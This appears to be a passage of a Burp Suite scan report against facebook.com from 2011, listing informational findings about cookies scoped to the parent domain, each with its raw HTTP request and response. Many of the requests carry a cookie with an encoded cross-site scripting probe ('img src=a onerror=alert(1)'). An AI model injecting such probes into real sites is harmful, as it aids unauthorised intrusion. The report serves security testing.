Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.92. http://www.facebook.com/sportingnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sportingnews

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.21
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 197753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.93. http://www.facebook.com/stefanoboscolomarchi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /stefanoboscolomarchi

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.94. http://www.facebook.com/techcrunch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /techcrunch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.25
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 39532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.95. http://www.facebook.com/terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.129
Connection: close
Date: Thu, 05 May 2011 10:56:50 GMT
Content-Length: 44062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.96. http://www.facebook.com/theteebers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /theteebers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.97. http://www.facebook.com/wmoppert

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /wmoppert

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.98. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.99. https://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.100. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • lsd=bnJmV; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.101. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.102. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.103. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.104. https://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
